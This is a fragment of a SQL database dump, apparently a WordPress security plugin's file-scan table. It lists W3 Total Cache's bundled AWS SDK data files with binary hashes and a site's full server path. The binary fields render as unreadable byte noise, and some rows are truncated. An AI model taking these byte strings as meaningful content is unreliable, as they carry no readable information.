0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DBG0kE','|B&=UT Gb՞N6ZN','',0,'?'),('@#9Yחl','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K5doEoH','2+#j)Xo vdA','',0,'?'),('_i%niv P','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&:?>\r','`A;r \"\"dp','',0,'?'),('\' y!VQ ZW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kĭw dD/>;b','m\\B\\$UPYΈ%@gS','',0,'?'),('m(G\nGxi','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z)$j!]','](\ZSĴoSDm\"UKN ','',0,'?'),('`p cPr@8','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iX{;2D','_mu+^g$\\i.5_','',0,'?'),('M)i7H^\n͔','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s*ƥ(',':d;п#Ԯ;0Ag','',0,'?'),('Z1k|ǡn?Pɱ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',v;AVJ3\0','pA\nmx\r\Zx%MJ9W[P|<','',0,'?'),('6;0I[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Lwyo}',' dnBUfPuoxORL^t|`\n','',0,'?'),('R;1vG~!?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d SCtgx','c\0^XQѓS h1Sg\r)Ji6F#-^','',0,'?'),('!k^+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d+f3M/3Y','AÌISo>I*JlAQfuf)','',0,'?'),('F@6X(@;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pcF*8\0 xT','\Z1 6jӠ#v ~@sk퓿µ','',0,'?'),('옔Bɇq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$rdOAI%','`\\=Ph$!4V#m< :','',0,'?'),('~ł.pl *','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f9Hy|:','f\ZUުJ\n|*< nR|`','',0,'?'),('!- \'pY@O)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BWvA ק',' \n%<z5ckWF2','',0,'?'),('\rva)&,ՒR','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','66','[Y%#gJZ_+0cvNV> D{','',0,'?'),('epC襝>','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 6x~W^Gu','c) +.hɜt{z^','',0,'?'),('/_t&lSO[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearchdomain/2013-01-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearchdomain/2013-01-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i9 ny1hK','k-X$@#0tȓfQ?0_|u','',0,'?'),('SEVEpIEA n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϲ&!','U͹Uv#׹nC yR9Jn','',0,'?'),('bhͰ菾D','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-7`[Rt','OS/T4<[̷','',0,'?'),('?\\egB|5','',0,'?'),('s/֧\0Z X\rt','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeartifact/2018-09-22/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeartifact/2018-09-22/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?wsh','mV!Bt# O?X\Z','',0,'?'),('mL\"-wԜy','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~~מz&Cgy','u9of7c V@Vkuh','',0,'?'),(' ,Tm\n\"${','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','op|w\'۱<ՙԂ','KFp.GC1aZ.tULŬQ','',0,'?'),(' HGt','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+Rl4#Fx','Ɩ7erEK=ϋ*zT\\F1fg','',0,'?'),('ª#DU\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sh-\Zp8M','i-`?l5TCNu\r\'\n','',0,'?'),('YAE\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fiܩADcX\0','\'Jy\07>ntלZֱիE','',0,'?'),('{Ȥ\rLG','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$qnbhϙ3','%q\ngArS]]HŁq\\zi)','',0,'?'),('o/8h]8څ3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3#IHՁt/|.','\n@s\\}_\"Fk~','',0,'?'),('U(:~s?ݯ۷','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xp*Ā\r($\Z','Iu j>\Z@`|J_%:YXBX_f','',0,'?'),('xi^Ս(#dj]','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j%,-NE','ܕBP~u`ؼ8H4LW','',0,'?'),('ErW!B','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lDOZUx',' 9=k9!X`D>vwc','',0,'?'),('u:3#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\"#>m&OG@','x\"N\rQѾB1ui[OM','',0,'?'),('>\ZDcZrup;E','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':.?snO',':p+bp]J!6\'Q\0|DX','',0,'?'),('HԵ_u=?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h#g9MBBM\0','YB3\'p{(W;V','',0,'?'),(',\n\\ۅTxZ `','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxn2o p','mvLarp89;~W_Av9}','',0,'?'),('|ql wȮ[.y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v1zPC','~&g?!K\0ܻ45ဃ.1','',0,'?'),(']c,Óߺ\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yxk@ <e','FD^uSG%Y.A>͉zH$5kP','',0,'?'),('pɥ2\"V','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g3Ru}P0','_1RP>K','',0,'?'),('_-)n(yc','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4QܧDQi','_DB=HiƔl~j&!HLW0[','',0,'?'),('0&8:̦݆7f','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aڌ 뎟N','ёXz@S\0֘=]Y\\|ɢ','',0,'?'),('{klɵA&\0D','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','נ&Ie9','J#2:i52=ڶ9 QCLtZѡٮr','',0,'?'),('4^H{T-?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ְ_lO1',' Kqf;̠nU7Hhkߔ','',0,'?'),('O ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z;gh$j\"','ixft9\\X\'!8:9嚉','',0,'?'),('qւ]f0=\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qx}lS~\" ','3\"Gman¶%y9hݬ','',0,'?'),('NV-+_uc/7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ais{8',']!emNÏMv','',0,'?'),('cܛ1X;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+2&X0T\ZZF','7jgLZA\\&4dEߋrRp','',0,'?'),('-Fj.<~N','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-identity/2014-06-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-identity/2014-06-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bALޯ2=: Fx>W','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','% \n-\ZX','67:ԆH%4To$\rLF,','',0,'?'),('M\n5v_x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zzl\'PAYK','v -;| mгK>F\n|ߌs','',0,'?'),('&ļS=QdT','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' GG[g','+D8\"DG2E8kkD]','',0,'?'),('u\n<','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t w\"','X{B\\۹V*2','',0,'?'),('Ff\ZKKI|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']# D ','z ejpPoǓ@߷lг','',0,'?'),('_tKw','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zi{-v','+FGo:4:mA R3','',0,'?'),('_ZsadektC','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zEIRݒ y','X!}c$Me=o}=pؐtC','',0,'?'),('Lo\rЗgV3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8~/:ƈ','3bu:(KedP\0suyW','',0,'?'),('R_\'6\Zk0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$DJٿ5B','vu^_ _&!d{4IXNl','',0,'?'),('_}v6\'O촾cY$Q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g50K N!t','cn%xۥTf><<','',0,'?'),('8 G8|IvT','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@MqYm -#C',')/!B.}%fzn 1JOp','',0,'?'),('ZL\'dLJ*G?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' zf4A}:','ɽӉi1GBޚϵbơO','',0,'?'),(' ÷Ro\nW]sJ ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','],Ҕ-B0< ',' vA@߄] J~M)!W;','',0,'?'),('=~. ek* f','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\r6-p4<','V5=LZo.P/hl.W{ب;','',0,'?'),('[?\" ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1eyUԗQ?;3K','۞[=1NRO/f6YW','',0,'?'),('$e\'PP`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z]p~ܥVQ.','Q*M6B~_4JP >Tp4̫^C','',0,'?'),('\0~5\r ɳ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"25LяMV','(2V`?Z-,U2:','',0,'?'),('#%.f0z`dog','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~p\'~M{5gE','<=e)%l\'.x`ZJ','',0,'?'),('Nɮ0\0M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';WT*v\0gbN','u7zSPc,Ө9;xif','',0,'?'),('j4vx4','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1<62z+','J2wQ@\Z\r)?Z(J%,S!','',0,'?'),('j:uI@̥(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vRYMLXV8n\'','6.8#TJܗ!obF','',0,'?'),(' ~Q\\& ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6쀭Ww<^','o+iq\n+\r`\053','',0,'?'),('؎R<C(WLG','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gg2̮;ϋ','$]wrfI翀ѓ†U 